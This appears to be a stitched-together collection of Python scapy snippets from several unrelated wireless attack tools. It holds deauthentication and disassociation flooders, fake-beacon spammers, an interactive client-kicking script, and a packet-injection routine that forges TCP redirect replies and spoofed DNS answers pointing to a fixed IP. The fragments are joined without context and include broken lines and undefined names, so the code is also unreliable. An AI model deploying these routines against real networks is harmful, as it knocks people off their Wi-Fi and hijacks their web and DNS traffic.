def _deauth_target(self, target, packet_count):
# This also works with subtype 10, "Disassociation-Frame", verified
# with MBP running 10.12.4
ap_to_client_pckt = scapy.RadioTap() / scapy.Dot11(
type=0,
subtype=12,
addr1=target,
addr2=self._ap_bssid,
addr3=self._ap_bssid) / scapy.Dot11Deauth(reason=1)
actually_sent = 0
for n in range(packet_count) or packet_count == -1:
if not self._thread_event.isSet():
break
if n % 64 == 0:
time.sleep(0.1)
scapy.sendp(ap_to_client_pckt)
actually_sent = n
print "Sent " + str(actually_sent + 1) + " packets to " + target
with self._thread_lock:
self._threads_finished += 1
def deuath(self, ap: AccessPoint):
"""
Sends deauth packets to a given access point.
"""
pkt = (scapy.RadioTap() / scapy.Dot11(
addr1="FF:FF:FF:FF:FF:FF", addr2=ap.bssid, addr3=ap.bssid) /
scapy.Dot11Deauth(reason=7))
while True:
scapy.sendp(pkt, iface=self._interface)
def deauth(self, ssid, mac, client="FF:FF:FF:FF:FF:FF"):
global ipiw_lock
ipiw_lock.acquire()
# AP -> Client
p1 = sc.RadioTap() / sc.Dot11(
type=0,
subtype=12, addr1=client, addr2=mac, addr3=mac) / sc.Dot11Deauth(
reason=5) # reason = "AP cannot handle this many stations"
# Client -> AP
p2 = sc.RadioTap() / sc.Dot11(
type=0,
subtype=12, addr1=mac, addr2=client, addr3=mac) / sc.Dot11Deauth(
reason=8) # reason = "Client is leaving"
# socket (for performance)
s = sc.conf.L2socket(iface=self.netifmon)
for i in range(100):
s.send(p1)
s.send(p2)
s.close()
ipiw_lock.release()
def scan(self):
target_mac = "28:cf:e9:1e:50:2d"
gateway_mac = "0a:00:27:00:00:0e"
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = scapy.RadioTap()/dot11/scapy.Dot11Deauth()
# send the packet
scapy.sendp(packet, inter=0.2, count=10000, iface="Wi-Fi", verbose=1)
def craft_disas_packet(sender, receiver, bssid):
"""
Return a disassociation packet crafted with given information
:param sender: The MAC address of the sender
:param receiver: The MAC address of the receiver
:param bssid: The MAC address of the AccessPoint
:type sender: str
:type receiver: str
:type bssid: str
:return: A disassociation packet
:rtype: scapy.layers.dot11.RadioTap
"""
return (scapy.RadioTap() / scapy.Dot11(
type=0, subtype=10, addr1=receiver, addr2=sender, addr3=bssid) /
scapy.Dot11Disas())
def pkt(self, info): dot11 = scapy.Dot11( type=0, subtype=8, addr1=broadcast, addr2=self.sender, addr3=self.sender ) beacon = Dot11Beacon() essid = Dot11Elt( ID=self.channel, info=info, len=len(info) ) frame = scapy.RadioTap()/dot11/beacon/essid return frame
def __init__(self, ssid, cap="ESS+privacy"):
dot11 = scapy.Dot11(type=0,
subtype=8,
addr1=broadcast,
addr2=str(scapy.RandMAC()),
addr3=str(scapy.RandMAC()))
beacon = scapy.Dot11Beacon(cap=cap)
essid = scapy.Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
rsn = scapy.Dot11Elt(ID="RSNinfo",
info=('\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
self.pkt = scapy.RadioTap() / dot11 / beacon / essid / rsn
def sendRTS(MAC1, MAC2, MAC3):
millis = 615
blob = struct.pack("<H", millis)
millis = struct.unpack(">H", blob)[0]
packet2 = scapy.RadioTap(present="Flags", Flags="FCS")
packet2 /= Dot11FCS(addr1=MAC1,
addr2=MAC2,
addr3=MAC3,
addr4="00:00:00:00:00:00",
subtype=11,
type=1,
ID=millis)
packet2 /= scapy.Dot11Beacon(cap="ESS", timestamp=1)
packet2 /= scapy.Dot11EltRates(rates=[130, 132, 11, 22])
#packet2 /= scapy.Dot11Elt(ID="DSset", info="\x03")
#packet2 /= scapy.Dot11Elt(ID="TIM", info="\x00\x01\x00\x00")
#p = scapy.srp(packet2,iface=monitor_if, timeout=0.1)
sendp(packet2, iface=monitor_if, inter=0.1, loop=1)
def disconnect_device(router_mac: str, target_mac: str, iface: str,
count: int):
"""
Force deauthenticate a device.
Args:
router_mac (str): Gateway MAC address.
target_mac (str): MAC address of target device.
iface (str): Ethernet Interface Name.
count (int): Number of packets to be sent.
"""
if count == 0:
count = None
dot11 = sc.Dot11(type=0,
subtype=12,
addr1=target_mac,
addr2=router_mac,
addr3=router_mac)
packet = sc.RadioTap() / dot11 / sc.Dot11Deauth(reason=7)
sc.sendp(packet, inter=0.1, count=count, iface=iface, verbose=0)
def main(dev):
subprocess.call(['ip', 'link', 'set', 'dev', dev, 'up'])
scapy_L2socket = scapy.conf.L2socket(iface=dev)
try:
station_info = initialize_stations(ssid_list, ssid_suffixes,
SSID_DUPLICATES)
loop_interval = (BEACON_INTERVAL * 0.001024) / len(station_info)
now = time.monotonic()
packet_sent = 0
last_stat = now
last_hop, next_hop = now, 7.5
last_rand, next_rand = now, 10
last_loop = now
while True:
now = time.monotonic()
if now - last_stat >= 5:
last_stat = now
print('{} packet sent'.format(packet_sent))
packet_sent = 0
if now - last_hop >= next_hop:
last_hop = now
next_hop = random.random() * 5 + 5
hop_channel(dev)
if now - last_rand >= next_rand:
last_rand = now
next_rand = random.random() * 10 + 10
randomize_station(random.choice(station_info))
packet = create_beacon_packet(random.choice(station_info))
packet = scapy.RadioTap(b'\x00\x00\x08\x00\x00\x00\x00\x00' +
packet)
scapy_L2socket.send(packet)
packet_sent += 1
now = time.monotonic()
if now - last_loop < loop_interval:
last_loop += loop_interval
time.sleep(last_loop - now)
else:
last_loop = now
finally:
scapy_L2socket.close()
#Start program
print(f"{RED}" + start)
#Show intructions
print(
f"{YELLOW}\n[!] Before run this program set your wireless card to monitor mode \n"
)
#Get informations from router
target_mac = input(f"{CYAN}Target MAC [EX: 68-7D-6B-OE-b-41]={RESET} ")
gateway_mac = input(f"{CYAN}Gateway MAC [EX: a4-33-d7-3a-d0-37]={RESET} ")
interface = input(f"{CYAN}interface [EX: wlan0man]={RESET} ")
packets = int(input(f"{CYAN}Number os packets={RESET} "))
#Create packet
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = scapy.RadioTap() / dot11 / scapy.Dot11Deauth(reason=7)
# send the packets
p = 0
while p <= packets:
scapy.sendp(packet, inter=0.1, count=100, iface=interface, verbose=1)
print(f"{YELLOW}[!] Packets send " + str(p)) #show number of send packets
p += 1
print(f"{GREEN}\n[+] ATTACK DONE !!!{RESET}")
apNum = raw_input(
"Pleas choose Ap from list above to see all devices on the AP \033[1m--enter Ap number--\033[0m"
)
print("connect to: ", ap[int(apNum)])
#step 3: we scan all devices on the AP
scapy.sniff(iface="mon0", prn=sniffmgmt, timeout=20)
#step 4 :chose Client MAC Address to attack
macNum = raw_input(
"Pleas choose device from list above to start Wifi deauth-attack \033[1m--enter mac number from list--\033[0m"
)
print("connect to: ", clients[int(macNum)])
# Access Point MAC Address
ap = ap[int(apNum)]
# Client MAC Address
client = clients[int(macNum)]
# Deauthentication Packet For Client
# Use This Option Only If you Have Client MAC Address
pkt1 = scapy.RadioTap() / scapy.Dot11(addr1=ap, addr2=client,
addr3=client) / scapy.Dot11Deauth()
t_end = time.time() + 100
while time.time() < t_end:
scapy.sendp(pkt1, iface="mon0", inter=0.001)
raw_input(
" '\033[1m'Finsih sucssesfuly! ThankYou Press --Enter to exit '\033[0m'")
def pkt_callback(pkt):
if pkt.haslayer(scapy.Dot11):
#print("got Wifi packet")
# construct fake l2 for wifi packet
macl = pkt.getlayer(scapy.Dot11)
l2 = scapy.RadioTap() / scapy.Dot11(
addr1=macl.addr2,
addr2=macl.addr1,
addr3=macl.addr3,
FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
elif pkt.haslayer(scapy.Ether):
#print("got Ethernet packet")
# construct fake l2 for ethernet packet
macl = pkt.getlayer(scapy.Ether)
l2 = scapy.Ether(dst=macl.src, src=macl.dst)
else:
print("protocol neither ethernet nor wifi, skipping")
return
if pkt.haslayer(scapy.IP):
# construct fake l3
ipl = pkt.getlayer(scapy.IP)
l3 = scapy.IP(src=ipl.dst, dst=ipl.src)
else:
#print("this is not IP packet, skipping")
return
if pkt.haslayer(scapy.TCP):
#print("we have TCP packet")
# construct fake layer 4 for TCP
tcpl = pkt.getlayer(scapy.TCP)
l4 = scapy.TCP(dport=tcpl.sport, sport=tcpl.dport)
if tcpl.flags == 2: # syn
return
elif tcpl.flags == 24 or tcpl.flags == 16: # psh ack
if pkt.haslayer(scapy.Raw):
#print("packet has some data")
tcpdata = pkt.getlayer(scapy.Raw).load
if tcpdata.startswith("GET "):
#print("TCP data starts with GET")
dsturl = helper.getdsturl(tcpdata)
if dsturl is None:
return
print("IP: %s, DST URL: %s" %
(pkt.getlayer(scapy.IP).src, dsturl))
if dsturl.find('0x0a') != -1 or dsturl.find(
'85.17') != -1 or dsturl.find(
'twitter') != -1 or dsturl.find(
'facebook') != -1 or dsturl.find(
'vk.com') != -1 or dsturl.find(
'blogger') != -1 or dsturl.find(
'odnoklassniki') != -1:
print "inject success"
return
#credirpkt = redirpkt % {'url': "http://0x0a.net/" }
credirpkt = redirpkt
# construct reply packet
pktreply = l2 / l3 / l4
pktreply.getlayer(scapy.TCP).seq = tcpl.ack
pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
pktreply.getlayer(scapy.TCP).flags = "PA"
# construct fin packet
finpktreply = pktreply.copy()
finpktreply.getlayer(scapy.TCP).flags = "FA"
finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)
# add redir payload to reply packet
pktreply.getlayer(scapy.TCP).add_payload(credirpkt)
packetbasket = [pktreply, finpktreply]
# send reply packet
scapy.sendp(packetbasket, verbose=0, iface=interface)
print("Reply sent")
return
elif tcpl.flags == 17: # fin ack
return
elif pkt.haslayer(scapy.UDP):
# construct layer 4 for UDP
udpl = pkt.getlayer(scapy.UDP)
l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)
if pkt.haslayer(scapy.DNS):
#print("We got DNS packet")
dnsl = pkt.getlayer(scapy.DNS)
if dnsl.qr == 0:
print("We got DNS request packet: %s" % (dnsl.qd.qname))
pktreply = l2 / l3 / l4 / scapy.DNS(
id=dnsl.id,
qr=1,
qd=dnsl.qd,
an=scapy.DNSRR(
rrname=dnsl.qd.qname, ttl=10, rdata="85.17.93.121"))
scapy.sendp([pktreply], verbose=0, iface=interface)
print("Reply sent")
return
else:
print("protocol not TCP or UDP, skipping")
#pkt.show()
return